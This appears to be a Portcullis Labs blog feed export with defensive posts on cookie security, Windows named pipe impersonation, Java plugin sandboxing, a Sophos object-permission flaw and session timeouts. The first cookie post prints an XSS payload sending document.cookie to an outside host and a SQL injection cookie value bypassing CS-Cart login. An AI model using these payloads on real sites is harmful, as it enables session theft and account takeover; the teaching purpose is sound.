Portcullis Labs » SDL https://labs.portcullis.co.uk Research and Development en-US hourly 1 http://wordpress.org/?v=3.8.5 Keep your cookies safe (part 2) https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/ https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/#comments Thu, 15 Feb 2018 20:31:26 +0000 https://labs.portcullis.co.uk/?p=3960 In the first blog post we talked about the dangers that your cookies are exposed. Now it is time to keep your cookies safe. Time to know what protection mechanisms there are, how to use them and why. How to read this post? The flowchart below will guide you to the process to check if […]

The post Keep your cookies safe (part 2) appeared first on Portcullis Labs.

]]>
In the first blog post we talked about the dangers that your cookies are exposed. Now it is time to keep your cookies safe. Time to know what protection mechanisms there are, how to use them and why.

How to read this post?

The flowchart below will guide you to the process to check if your cookies are well protected. Note that there are more factors and cases that could potentially compromise your cookies (as we talked in the part 1 of the blog post).

Of course at the end of the post you will find the explanation to the flowchart. So if you do not understand anything, do not panic! Look for the question in the last part of the blog where it will be explained.

flowchart about securing cookies
image-3961

A flowchart about how to get your cookies better secured.

Is your session cookie different before and after login?

  • Correct answer: Yes, if your unique session ID cookie is different after and before login, your session is correctly protected against Session Fixation attacks
  • Incorrect answer: No, your unique session ID cookie is the same, if an attacker managed to stole your cookie before login into the web application, then once you are authenticated the attacker could also access the application

Recommendation: Session ID should be changed after and before user logs in.

Are you invalidating the session when the user logs out?

  • Correct answer: Yes, once the user has logged out, the session must be destroyed or invalidated
  • Incorrect answer: No, if you do not destroy the session ID in server side, the session will continue being valid

Recommendation: Session must be invalidated after the user logs out.

Does your cookie have the attribute “HttpOnly”?

  • Correct answer: Yes, your cookie is only accessible via http and not via JavaScript
  • Incorrect answer: No, your cookie is also accessible via JavaScript , which in case of an attacker compromise your application with a Cross-site Scripting, it could access to your cookie

Recommendation: Set the cookie as “HttpOnly”.

Does your cookie have the full domain attribute set?

  • Correct answer: Yes, your cookie is only being sent to the correct domain where it is needed
  • Incorrect answer: No, your cookie can be sent to the multiple sub-domains you could have

Recommendation: The full domain of the cookie must be specified.

Does your cookie have an adequate lifetime?

  • Correct answer: Yes
  • Incorrect answer: No, Cookies with an excessive lifetime will not be deleted when the user closes their browser and would therefore be exposed should an attacker manage to compromise the user’s system

Recommendation: Use cookies without a lifetime so that they are deleted once the user closes their browser or lower its lifetime to meet business requirements.

Do you have only one web application in the same domain?

What does this question mean? The following is an example of multiple web applications in the same domain:

  • www.mydomain.com/app1
  • www.mydomain.com/app2
  • www.mydomain.com/app3

There is not a correct answer to this question.

If you only have one application running over the same domain, you should not need to care about this issue. However if you host multiple web applications, you need to set the attribute “path” of the cookie to ensure that the cookie is only being sent to the web application it belongs.

Are your cookies NOT storing sensitive information?

  • Correct answer: Yes, my cookies do not contains sensitive information
  • Incorrect answer: No, there are some sensitive information in the cookies

Recommendation: Ensure that sensitive information is not stored in the cookies.

Does your web application support HTTPS?

If the answer to this question is NO, you are sending all the data through a plain text protocol. An attacker able to intercept network traffic between a user’s session and the web server could capture the sensitive data being transmitted.

If the answer is YES, there is some other question you need to answer before know if you are protecting correctly your cookies:

Does your web application use HTTP + HTTPS (mixed content)?

If the answer is NO, it means that HTTP is not allowed and all the data is being sent over HTTPS. Although your cookie is secure in this case, you need to be careful if you enable HTTP.

If the answer is YES you need to answer one more question:

Is HSTS (HTTP Strict Transport Security) enabled or has the cookie the attribute “secure”?

If you have HSTS enabled, you are forcing all the data being sent over HTTPS (cookies included).

If the cookie has the attribute “secure”, you are forcing the cookie to be sent only over HTTPS.

Recommendation: Set the cookie as “secure” and consider to enable HSTS.

The post Keep your cookies safe (part 2) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/feed/ 0
Web Application Whitepaper https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/ https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/#comments Wed, 06 Sep 2017 11:12:46 +0000 https://labs.portcullis.co.uk/?p=6078 This document aims to analyse and explore data collected from technical assurance engagements during 2016. The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP however due to time constraints, our data points were not […]

The post Web Application Whitepaper appeared first on Portcullis Labs.

]]>
This document aims to analyse and explore data collected from technical assurance engagements during 2016.

The original piece of data analysis was performed by two of our interns (Daniel and Chris) as part of Cisco’s intended contribution to the next Top 10 publication from OWASP however due to time constraints, our data points were not submitted. As a result, the co-authors (Simone and Isa) chose to compare the EMEAR team’s statistics from 2016 against the now public 2017 Top 10 published by OWASP. Additionally, they also took a look at the most common web application issues reported by the Team during the last year and analysed their impact and severity.

WAW
WAW.pdf
September 6, 2017
Version: 1.0
925.6 KiB
MD5 hash: 0986d3ab7f6f55c71199296189ce5f62
Details

The post Web Application Whitepaper appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/whitepapers/web-application-whitepaper/feed/ 0
Keep your cookies safe (part 1) https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/ https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/#comments Fri, 22 Apr 2016 15:03:32 +0000 https://labs.portcullis.co.uk/?p=3605 What are cookies and why are they important? A cookie is a small piece of data sent from a web site and stored in a user’s web browser and is subsequently includes with all authenticated requests that belong to that session. Some cookies contain the user session data in a web site, which is vital. […]

The post Keep your cookies safe (part 1) appeared first on Portcullis Labs.

]]>
What are cookies and why are they important?

A cookie is a small piece of data sent from a web site and stored in a user’s web browser and is subsequently includes with all authenticated requests that belong to that session. Some cookies contain the user session data in a web site, which is vital. Others cookies are used for tracking long-term records of an individuals browsing history and preferences such as their preferred language. Sometimes they are also used for tracking and monitoring a user’s activities across different web sites.

Due to the fact that HTTP is a stateless protocol, the web site needs a way to authenticate the user in each request. Every time the user visits a new page within a web site, the browser sends the users cookie back to the server, allowing the server to serve the correct data to that individual user, which is tracked using a session ID. Cookies therefore play an integral part in ensuring persistence of data used across multiple HTTP requests throughout the time a user visits a web site.

What does a cookie look like?

Set-Cookie: __cfduid=d8a3ae94f81234321; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.domain.com; HttpOnly

The cookie below is an example of a common cookie generated for WordPress. Here we break down each part of the cookie and explain what it is used for:

  • Set-Cookie – the web server asks the browser to save the cookie with this command
  • __cfduid=d8a3ae94f81234321;: This is the cookie itself. At the left of the equals symbol is the name of the cookie and to the right is its value
  • expires=Mon, 23-Dec-2019 23:50:00 GMT; – this is the date and time when the cookie will expire
  • path=/; domain=.domain.com; – the cookie domain and path define the scope of the cookie. They tell the browser that cookies should only be sent back to the server for the given domain and path
  • HttpOnly – this attribute (without a value associated) tells the browser that JavaScript cannot be used to access the cookie, which must only be accessed through HTTP or HTTPS. Sometimes you will also see the attribute “Secure”, which prevents the cookie being sent over the unencrypted HTTP protocol (i.e. the cookie will only be transmitted over HTTPS)

What is the impact of having your cookies compromised?

A traditional and important role of a cookie is to store a users session ID, which is used to identify a user. If this type of cookie is stolen by a malicious user, they would be able to gain access to web site as the user for which the cookie belonged to (i.e. the malicoius user would have access to your account within the web site).

In the case of the tracking cookie, the malicious user would have access to your browsing history for the web site.

Another problem arises when sensitive data is stored in cookies, for example a username, and this is also a vector for server side exploitation if its contents are not properly validated, which can potentially lead to serious vulnerabilties such as SQL Injection or remote code execution.

What are the main cookie threats?

cookie monster image

Cookie Monster.

There are different attacking vectors in which obtaining and modifying cookies can occur, leading to session hijacking of an authenticated user session, or even SQL injection attacks against the server. These threats may take place when an attacker takes control of the web browser using Cross-site Scripting, or Spyware, in order to obtain a users SessionID cookie that can then be used by an attacker to impersonate the legitimate user, as shown in the following example:

Obtaining access to the cookie can be as easy as using the following JavaScript line:

document.cookie

Imagine that the web site has a search form that is vulnerable to Cross-site Scripting (Reflective Cross-site Scripting in this case).


http://myweb.com/form.php?search=XSS_PAYLOAD_HERE

An attacker could use the following payload to send the cookie to an external web site:

<script>location.href='http://external_web site.com/cookiemonster.php?c00kie='+escape(document.cookie);</script>

The final step would be to send the vulnerable link to an admin and wait for them to click on it. If the attacker uses an URL shortener, this allows for further obfuscation of the malicous URL, as the admin will be unable to see the content of the link they have been sent.

An attacker able to read files from a given user may also attempt to retrieve the cookies stored in files from a system. Furthermore some browsers store persistent cookies in a binary file that is easily readable with existing public tools.

Security weaknesses may also reside server side when cookies are modified, if input validation routines are not adequately implemented. The example below shows how to bypass the authentication process:

//In /core/user.php: (cs cart vulnerability)

if (fn_get_cookie(AREA_NAME . '_user_id')) {
 $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status, membership_id FROM $db_tables[users]
 WHERE user_id='".fn_get_cookies(AREA_NAME . '_user_id')."' AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
 fn_define('LOGGED_VIA_COOKIE', true);

}

//Cookie: cs_cookies[customer_user_id]=1'/*;

For their role, cookies are really important and may be used in different attacks.

Now that you are more aware of the dangers, it would be wise to ensure steps are taken to deploy web site cookies safely and securely. Look out for the second part of this post!

The post Keep your cookies safe (part 1) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/feed/ 0
Windows Named Pipes: There and back again https://labs.portcullis.co.uk/blog/windows-named-pipes-there-and-back-again/ https://labs.portcullis.co.uk/blog/windows-named-pipes-there-and-back-again/#comments Fri, 20 Nov 2015 14:04:20 +0000 https://labs.portcullis.co.uk/?p=5378 Inter Process Communication (IPC) is an ubiquitous part of modern computing. Processes often talk to each other and many software packages contain multiple components which need to exchange data to run properly. Named pipes are one of the many forms of IPC in use today and are extensively used on the Windows platform as a […]

The post Windows Named Pipes: There and back again appeared first on Portcullis Labs.

]]>
Inter Process Communication (IPC) is an ubiquitous part of modern computing. Processes often talk to each other and many software packages contain multiple components which need to exchange data to run properly. Named pipes are one of the many forms of IPC in use today and are extensively used on the Windows platform as a means to exchange data between running processes in a semi-persistent manner.

On Windows, named pipes operate in a server-client model and can make use of the Windows Universal Naming Convention (UNC) for both local and remote connections.

Named pipes on Windows use what is known as the Named Pipe File System (NPFS). The NPFS is a hidden partition which functions just like any other; files are written, read and deleted using the same mechanisms as a standard Windows file system. So named pipes are actually just files on a hard drive which persist until there are no remaining handles to the file, at which point the file is deleted by Windows.

The named pipe directory is located at: \\<machine_address>\pipe\<pipe_name>

There are many easy ways to read the contents of the local NPFS: Powershell, Microsoft SysInternals Process Explorer and Pipelist as well as numerous third party tools.

It’s also very easy to implement in a language such as C#, with a basic read all of the named pipes directory being as simple as:

System.IO.Directory.GetFiles(@"\\.\pipe\");

Exploitation of named pipes

Named pipes were introduced with NT and have been known to be vulnerable to a number of attacks over the years, especially once full support was adopted with Windows 2000. For example, the Service Control Manager (SCM) of Windows was discovered to be vulnerable to race conditions related to Named Pipes in 2000, more recently, a predictable named pipe used by Google Chrome could be exploited to help escape from the browser sandbox.

To date,the most common way to exploit named pipes to gain privileges on a system has been to abuse the impersonation token granted to the named pipe server to act on behalf of a connected client.

If the named pipe server is already running this is not particularly useful as we cannot create the primary server instance which clients will connect to, so it is generally required to preemptively create a named pipe server using the same name as the vulnerable service would normally create. This means that the user needs to know the name of the pipe before the vulnerable service is started and then wait for a client to connect. Ideal targets are services which run at administrator or SYSTEM level privileges, for the obvious reasons.

The problem with impersonation tokens begins when a client is running at a higher permission level than the server it is connecting to. If impersonation is allowed, the server can use the impersonation token to act on the client’s behalf.

The level of impersonation a server can perform depends on the level of consent a client provides. The client specifies a security quality of service (SQOS) when connecting to the server. The level of impersonation provided to the server by the SQOS can be one of the following four flags, which in the case of named pipes are provided as part of the connection process when calling the CreateFile function:

  • SECURITY_ANONYMOUS – no impersonation allowed at all. The server cannot even identify the client
  • SECURITY_IDENTIFICATION – tmpersonation is not allowed, but the server can identify the client
  • SECURITY_IMPERSONATION – the client can be both identified and impersonated, but only locally (default)
  • SECURITY_DELEGATION – the client can be identified and impersonated, both locally and remotely

When granted, impersonation tokens can be converted to primary security tokens with ease by calling the DuplicateTokenEx() function. From here it is just a matter of calling the CreateProcessAsUser() function to spawn a process (let’s say cmd.exe) using the new primary token which has the security context of the client.

Numerous Metasploit modules are available for exploiting named pipe vulnerabilities which have cropped up over the years. For example, the getsystem module in Metasploit makes use of named pipes to escalate to SYSTEM level privileges from Administrator.

Metasploit includes 2 different techniques which use named pipes to ‘get system’. The first one works by starting a named pipe server and then using administrator privileges to schedule a service to run as SYSTEM. This service connects as a named pipe client to the recently created server. The server impersonates the client and uses this to spawn a SYSTEM process for the meterpreter client.

The second technique is similar to the first, but instead a DLL is dropped to the hard drive which is then scheduled to run as SYSTEM, this technique is evidently not as clean as the first technique.

Thanks to Cristian Mikehazi for his prior research in to Metasploit’s getsystem module which made this section easier to write.

Security considerations for Named Pipes / How to make safe pipes

The security of named pipes is largely down to the developer and how they choose to implement the server and client sides of the application.

This is by no means an exhaustive list, but below details some of the good practices which should be considered whenever named pipes are to be deployed.

Server side security

The named pipe server is responsible for creating and managing a named pipe and its connected clients. Therefore, the most important element is to ensure that the named pipe server is indeed the correct server.

In this effect, there is an important flag which should be set when attempting to start new named pipe server: FILE_FLAG_FIRST_PIPE_INSTANCE.

By setting this flag it ensures that if the instance the server is attempting to create is not the first instance of the named pipe, it does not create the instance. In other words, it can give an indication as to whether another process has already created a named pipe server with this name and can allow for corrective action. This could be in the form of creating the server with an alternate name or stopping execution entirely.It is also a good idea that any intended clients are also made aware, if possible, that the server instance is not valid or has been changed so that they do not attempt to connect.

Further to this, creation of a named pipe server with a pseudo-randomly generated name can assist in ensuring any attempt by an attacker to preemptively create the server process will be unsuccessful. This is an approach the Google Chrome browser uses to help thwart unintended processes from creating the named pipe servers it uses for communication.

Another important server element is the maximum number of client instances allowed at any one time. If the maximum number of potential clients which will connect is known, a hard figure should be set to ensure that no further clients can connect. The flag which defines the maximum number of concurrent pipe instances is set as an integer value between 1 and 255 at invocation. To allow unlimited connections, the flag is set to PIPE_UNLIMITED_INSTANCES.

Client side security

Whenever a client pipe is under development, it is extremely important to consider carefully the level of privileges the pipe needs to do its job and to run it at the minimum level required.

The primary source of exploits against named pipes is through the  impersonation of client privileges by the named pipe server. The easiest and most direct way to prevent a named pipe client from being impersonated is disallow pipe impersonation when connecting to a server. This can be achieved by setting the SECURITY_IDENTIFICATION flag or the SECURITY_ANONYMOUS flag when calling the CreateFile() function as part of the client connection process.

In cases where impersonation is necessary, there are a number of other ways to ensure that only a legitimate client connects to a server. For example, in a simple application a specific sequence of information could be exchanged between the server and the client (a handshake) before any actual data is exchanged. For more advanced protection, encryption could be used. While not natively supported, public key cryptography (PKI) could be used if implemented correctly. These mechanisms are beyond the scope of this post but are worth bearing in mind.

The post Windows Named Pipes: There and back again appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/windows-named-pipes-there-and-back-again/feed/ 0
Building a sandpit https://labs.portcullis.co.uk/blog/building-a-sandpit/ https://labs.portcullis.co.uk/blog/building-a-sandpit/#comments Tue, 18 Nov 2014 16:55:02 +0000 https://labs.portcullis.co.uk/?p=1108 Today I was looking at how plugins could safely be incorporated into a J2EE application server. The plugins in this instance are executed server side, rather than on the client and are, in the main, provided by 3rd parties (digital advertising agencies etc). The aim was to limit the scope in which they operate. The […]

The post Building a sandpit appeared first on Portcullis Labs.

]]>
Today I was looking at how plugins could safely be incorporated into a J2EE application server. The plugins in this instance are executed server side, rather than on the client and are, in the main, provided by 3rd parties (digital advertising agencies etc). The aim was to limit the scope in which they operate. The implementation I looked at is pretty much the first instance where I’ve seen these techniques used, so I thought it was worth sharing.

Let’s begin by enumerating the techniques can be used:

  • Enforcement of code signing
  • Execution by a custom class loader
  • Use of a custom security manager
  • Execution under a custom policy

The use of code signing by the JRE to secure it is most commonly used on applets that are deployed as part of a web application. In that context, Oracle use code signing to warn users about untrusted code and to limit the APIs that untrusted code can make use of. Of course, historically, this technique has been bypassed by luring users into accepting the untrusted code (these days Java will prompt even if code is signed and browsers often offer their own prompt too) and identifying flaws in the JRE which allow the untrusted code to call APIs that would otherwise be restricted. Whilst the latter is still a potential cause for concern, running untrusted in a J2EE application server won’t result in a popup that can be ignored, making this technique more far more effective.

However, in the case of an application running in a J2EE application server, this distinction between trusted and untrusted code is not typically present and all code is considered trusted. To enable the use of signed code, the developers therefore opted to make use of a custom class loader. The custom class loader they implemented extended the SecureClassLoader class, not just to enforce code signing as outlined above but also to limit where classes could be loaded from. Taking this approach, an malicious code would not only need to be correctly signed but would also need to have been deployed to a specific directory path. Further more attempts by plugin developers to load arbitrary bytecode, either from the JRE or from other untrusted sources could be reviewed and granted on a case by case basis. By doing so, the developers hoped to minimise the APIs that the plugins can make use of as well as limit the potential for an installed plugin to fetch and execute malicious code after it had been initially reviewed and found to be suitable for deployment.

An additional side effect of implementing a custom class loader as described is that it can be used in combination with a custom security manager to limit the APIs that the 3rd parties can call. The security manager is designed to determine whether any sensitive operation should be allowed. For example, it can limit access to files and network resources to prevent any unauthorised operations from occurring by mediating on behalf of the underlying JRE when such operations are attempted. The developers ensured that setSecurityManager() was called early with a custom security manager which overrode the default and implemented checkRead() etc in a restricted form. All in all, the custom security manager they wrote needed to implement checks for manipulation of the JVM (such as whether new custom class loaders are allowed), security managers (such as whether the custom class loader is allowed to instantiate a given class), system resources, threads, files and network resources.

Since bugs in the security manager (and access controllers present in later releases of the JRE) can be effectively exploited to gain access to privileged calls by untrusted code, the implementation called for an access controller where only a small subset of allowed operations were permitted. By doing so the developers were able to isolate one installed plugin’s ability to access resource that were only intended to be access that of other installed plugins. In particular, to complete the code signing protection checkAccess() was implemented to allow only a small set of trusted code signers.

Whilst the developers we worked with chose to implement their own security manager, I feel that there is benefit in discussing an alternate approach. Underneath the surface of the default access controller present within the JVM are a series of permissions which can be assigned or modified by the use of a custom security policy. Indeed, it would be possible to make use of these permissions within the developers custom security manager as an alternative to implementing the checks as code. In my mind, utilising a security policy is preferable since much of the complexity is abstracted away however it gives less fine grained access controls since you’re limited to the policy language as implemented within the JRE.

Remember that whilst privilege escalation vulnerabilities are relatively common in the JRE as a whole (hence the raft of remote code execution bugs we’ve seen with applets), what we’ve looked at here is a security in depth measure that can be applied to so-called trusted code supplied by a 3rd party developer that runs in a server environment. Thankfully, the threat actors in a position to exploit any bugs you may leave behind is significantly reduced.

In conclusion, the concepts I’ve touched on in this blog post are are quite complex and leave a fair degree of discretion to developers which may allow for vulnerabilities to be introduced. If you’re interested in implementing such a solutions, I would strongly recommend that you acquire a copy of Java Security which covers these and other concepts in far greater depth. Useful too, is the security research of Security Explorations, a Polish research company who have had a lot of fun with Java.

The post Building a sandpit appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/building-a-sandpit/feed/ 0
EMF Camp 2014 talk https://labs.portcullis.co.uk/blog/emf-camp-2014-talk/ https://labs.portcullis.co.uk/blog/emf-camp-2014-talk/#comments Thu, 28 Aug 2014 17:15:14 +0000 https://labs.portcullis.co.uk/?p=4646 We recently announced our sponsorship of EMF Camp 2014, were ready to go Portcullis flags in tow and will be heading on over to Milton Keynes to help get EMF ready. While there we will not only be sponsoring the Lounge where people can come and enjoy a space to relax and drink beer and […]

The post EMF Camp 2014 talk appeared first on Portcullis Labs.

]]>
We recently announced our sponsorship of EMF Camp 2014, were ready to go Portcullis flags in tow and will be heading on over to Milton Keynes to help get EMF ready.

While there we will not only be sponsoring the Lounge where people can come and enjoy a space to relax and drink beer and setting up Portcullis Village where people can visit us and exchange ideas but we will be having members of Portcullis hosting talks throughout the weekend.

How Many Bugs Can A Time Server Have? Friday 29th @ 14:00PM Stage B

Portcullis members Tim Brown and Mike Emery will be talking about a number of new advisories to be released by Portcullis during the event including remote root in a network device. The attack surface area will be broken down, with the bugs in each area exposed. The impact of the finding as a whole will then be discussed, with the consequences potentially reaching far beyond the compromised device itself!

Minimal Effort Web Application Security (a.k.a. how to make my job harder) Sunday 31st @ 12:00 Stage C

Portcullis member Graham Sutherland will be presenting his quick tips on making your web applications more resistant to common attack vectors, without putting a lot of effort in. Graham says “In some cases, simply adding a like to a configuration file can completely prevent entire classes of attack from being viable”. Graham will take a look at hardening against XSS, SQL injection, click jacking, password cracking, and a few other bits if there’s time. “With any luck, you’ll make my job a lot harder!”

For those spoilt for choice both talks will be featured in our EMF blog to be posted after the event.

The post EMF Camp 2014 talk appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/emf-camp-2014-talk/feed/ 0
Windows System Objects and Sophos Endpoint Security https://labs.portcullis.co.uk/blog/windows-system-objects-and-sophos-endpoint-security/ https://labs.portcullis.co.uk/blog/windows-system-objects-and-sophos-endpoint-security/#comments Mon, 03 Feb 2014 11:30:42 +0000 https://labs.portcullis.co.uk/?p=3359 Windows system objects are one of the interesting areas of binary application assessments that are often ignored or misunderstood. Many people don’t realise that abstract Windows application programming concepts such as mutexes, events, semaphores, shared memory sections, and jobs all come together under the purview of the Windows Object Manager. These objects, like those in […]

The post Windows System Objects and Sophos Endpoint Security appeared first on Portcullis Labs.

]]>
Windows system objects are one of the interesting areas of binary application assessments that are often ignored or misunderstood. Many people don’t realise that abstract Windows application programming concepts such as mutexes, events, semaphores, shared memory sections, and jobs all come together under the purview of the Windows Object Manager. These objects, like those in the filesystem and registry namespaces, have all sorts of interesting security impacts when not properly managed.

This blog post relates to an advisory. See CVE-2014-1213: Denial of Service in Sophos Anti-Virus for the release.

One of the major differences of the system object namespace, versus filesystem and registry namespaces, is the concept of a default Discretionary Access Control List (DACL). These DACLs are the cornerstone of the Windows security model, and are used to describe which entities (users, groups, etc.) have specific types of access to an object. When you view the permissions on a file or directory, you’re looking at a direct representation of the DACL for that object. Each rule within a DACL is called an Access Control Entry (ACE). When an object in any namespace is created and the application does not explicitly provide a DACL, the system looks at the parent container to see if it has any ACEs within its DACL that are marked as inheritable. If it finds some, it applies them across into a new DACL for the newly created object. There are special rules around inheritance for containers, but we won’t get into that here. If there are no inheritable ACEs, it resorts to applying the default DACL for the namespace. This is where things get interesting from a security perspective; the system object namespace, in contrast with registry and filesystem namespaces, has no default DACL. In this situation, the system applies an empty DACL, which allows everyone full access to the object.

This is a corner-case that many developers fall foul of. Objects created in the local container (i.e. the system object container for the current session) inherit some ACEs from the session container, but the global container has no inheritable ACEs, and therefore objects within it that are created without an explicit DACL will end up with an empty DACL. We can see this in action by viewing the DACLs applied to the global and session containers, using a tool such as WinObj:

DACL applied to session container in the Windows system object namespace.
image-3360

DACL applied to session container in the Windows system object namespace.

DACL applied to global container in the Windows system object namespace.
image-3361

DACL applied to global container in the Windows system object namespace.

Notice that all the ACEs in the global container are marked as “Inherit None”, meaning that child objects will not inherit them as part of their DACL. As such, if you create a system object such as a mutex or an event through the usual CreateMutex or CreateEvent API calls, and fail to explicitly provide a DACL, all users on the system will have unrestricted access to that object.

Whilst digging into security issues around this common mistake, I found a number of vulnerabilities in a range of products. In general the impacts of being able to mess with these were low, usually causing the affected application to lock up or stop working in some way. In Sophos Endpoint Security, however, the impact was more interesting. Most anti-malware software consists of three major sections: a user-facing GUI for controlling and monitoring the product, a high privilege user-mode service for performing various scanning features, and one or more kernel-mode modules (commonly referred to as drivers) that provide filesystem filters, notification of new threads and processes, low-level memory access, hook detection, and other kernel-level functionality. Communicating quickly and reliably between these components is a daunting task, especially when your messages have to traverse across the user-mode / kernel-mode barrier. Enter global system objects. Mutexes, events, semaphores, and shared memory sections in the global container of the system object namespace are all directly accessible from both user-mode and kernel-mode. When combined properly, these object types allow a developer to create an inter-process communications framework that is fast, reliable, and thread-safe.

One example of this might be a feature where a filesystem filter driver needs to notify the user-mode service that new data has been written to disk, so that it can scan it. Three named objects – an event, a mutex, and a shared memory section – are created within the global namespace, so that both components can access them. The event is used to signal that a write operation is pending, the mutex is used to ensure that the shared memory section is accessed by only one thread at a time, and the shared memory section is used to hold information about the event. The whole process is rather complex, and is best described in a diagram:

Example IPC mechanism

Diagram of an example IPC mechanism between a user-mode AV service and a kernel-mode file system driver.

As you can see, the user-mode service is responsible for checking the write operations before they are allowed. The decision is passed back to the driver, which either completes the write or rejects it, issuing an appropriate error code.

Now, imagine you let a low-privilege user interact with these objects. For one, they may be able to wait on the event object themselves and modify the shared memory section via a race condition. This can be somewhat mitigated by various integrity checks, but isn’t outside the realms of possibility. Another issue is that all of these components modify their state, and in some cases block execution, when the event and mutex objects are waited upon or signalled. Imagine that a malicious local user acquires the mutex, then signals the event. The user-mode service continues execution (step 7) and attempts to acquire the mutex (step 8), but since the malicious user has already acquired it, the service thread is now blocked. From this point on, the driver’s calls to have write operations checked go unheeded. Although the architecture is not identical, this is precisely the mechanism in which Sophos Endpoint Security failed.

As the advisory describes, CVE-2014-1213 relates to a lack of DACLs applied to system objects. As we discussed above, failure to explicitly supply a DACL when creating system objects results in the object being created with the default DACL for the namespace, which is null (i.e. empty). The impact is that a local low-privilege user can manipulate these objects as they wish. Since this can lead to disk IO requests being ignored, or at least heavily delayed, the system eventually cannot continue. In many cases it simply locks up and becomes unresponsive, as user-mode programs and subsystems (e.g. SMSS / CSRSS) cannot complete blocking disk operations. In some cases, the system will recognise the pattern of failures and forcefully terminate the system with a bugcheck (BSoD) in order to reduce the potential for permanent damage to the system state. Of course, this isn’t particularly interesting from a security perspective if you only consider a desktop environment, but imagine the impact on a terminal services system with hundreds or thousands of users.

Sophos have now patched this issue in engine 3.50, which went live on the 21st of January. Portcullis have independently verified this fix as being effective after the update is applied and the system is rebooted.

The post Windows System Objects and Sophos Endpoint Security appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/windows-system-objects-and-sophos-endpoint-security/feed/ 0
Improving the security in web sessions (part 2) https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/ https://labs.portcullis.co.uk/blog/improving-the-security-in-web-sessions-part-2/#comments Fri, 24 Jan 2014 00:02:38 +0000 https://labs.portcullis.co.uk/?p=2591 The previous post about session management was about how to improve the security of web sessions. An aspect which was not addressed in that post is how to identify that a session is not in active use any more but where the user has manually logged out. For example, a user who was using a […]

The post Improving the security in web sessions (part 2) appeared first on Portcullis Labs.

]]>
The previous post about session management was about how to improve the security of web sessions. An aspect which was not addressed in that post is how to identify that a session is not in active use any more but where the user has manually logged out. For example, a user who was using a banking application and closed the tab without logging out the application.

This point is also crucial for web applications because, computers and web browsers are frequently shared between people so it is important that this case cannot be exploited. Identifying when the user stops working with a web application and terminating the session reduces the window of opportunity that surrounds this type of attacks.

Although web applications should always include a “Log out” button, it is even naive to think that all the users are going to close their sessions when they finish to use a web application or before closing the tab/web browser where it was loaded.

Using JavaScript events

JavaScript allows to control an event which is fired at the moment of a browser window or a browser tab is closed. The name of this event is onbeforeunload. In fact, this event is fired before a page is unloaded, that includes: closing the tab, reloading the page, using the browser’s navigation buttons, click on a link…

The implementation of how the web browser acts when this event is launched depends on the web browser. In general, this event can be used to display a message box asking the user if he wants to close the current page. This message box contains two buttons to allow the user to choose between completing the action, closing the tab, or staying in the page.

So, in principle, it could be possible to detect when the user is closing the page and then send a request to the server with his confirmation. But the fact is that the majority of the web browsers do not return the control to the JavaScript interpreter before closing the tab; so it is not possible to send the request only in those cases that the user decides that he actually wants to close the tab (the event can always send a request before asking the user, but in few browsers will be able to do it after confirmation).

It was possible to check that Firefox returns the control to the JavaScript interpreter, but depending on the version, this only works when the page is reloaded, but not when a tab or the browser is closed (tested with versions 23 and 24). In the same way, Opera version 17 will send the logout request when the browser is closed, but not if the user closes is the tab. The rest of the tested browsers (Safari , IE and Chrome) did not send anything if the user confirmed the tab/browser closing.

The following code is an example about how to implement it:

<html>
<script src="http://code.jquery.com/jquery-1.10.2.min.js">

// Not using JQuery
/*
window.onbeforeunload = function () {
    return  "Are you sure want to LOGOUT the session ?";
};

// Used to logout the session , when browser window was closed
window.onunload = function () {
    $.get( "http://127.0.0.1/logout" );
};
*/

// Using JQuery
$(window).on('beforeunload', function() {
        return 'Are you sure want to LOGOUT the session ?';
});

$(window).unload(function() {
        $.get( "http://127.0.0.1/logout" );
});
</script>

<body>
  <h1><i>Unload</i> and <i>Beforeunload</i> example</h1>
  Please, reload, close this tab or close the browser to launch the test.
</body>
</html>

So, as you would be able to note, this is not a suitable solution to the original problem outlined at the start of this post.

Using AJAX ping

A better approach, because it should work in any web browser, is to reduce the session timeout configuration in the server to few minutes (2-5 minutes) and to ping the server regularly (15-30 seconds) with an AJAX request. The ping request will maintain the sessions life on the web server, preventing it from being timed out unintentionally. On the other hand, if the user closes the tab or the browser, the session will be terminated by the web server after the determined period.

The code below is a possible implementation of an AJAX ping using jQuery:

$(function() { window.setInterval("$.post('http://example.com/keepAlive');", 15000); });

This line should be included in every web page of the application, so it would be a good idea to create a file with it and include the file in the contents of every page served by the web serve.

With this solution, there are two problems:

  • The server will need to be able to support the load of the ping requests which, depending on the number of users, could be thousands each minute. But an application which had that number of users should be able to support that load, so this is not a real problem.
  • If the user leaves the application opened in a browser without supervision, the session will never time out.

The way to fix the second problem is to count the number of pings the server received without any other kind of request and to configure the application to close the session after the corresponding time (idle time). The time limit will need to be longer than the session timeout that has been configured, to avoid those cases of users who are using the application but staying in the same page for a while. For example:

Imagine that the session timeout was configured to 2 minutes and the delay between pings, 15 seconds. That means that after closing the browser, the session will remain live for 2 minutes maximum before being closed. That is a suitable period of time for the web server to wait before timing the session out because it will tolerate some network or connectivity problems which could in principal cause some of the pings to be lost (8 ping requests would have to be lost to close the session by mistake).

The major problem is the idle time, which will have to be configured depending on the kind of application. If the web application contains long articles, the idle time should be set to a longer period (5-10 minutes). If the application consists of small pages, then the idle time could be configured to the same as the session timeout (but never shorter).

By doing this, the application will cover:

  • If the tab or web browser is closed, the session will be terminated after session time out (2 minutes in the example).
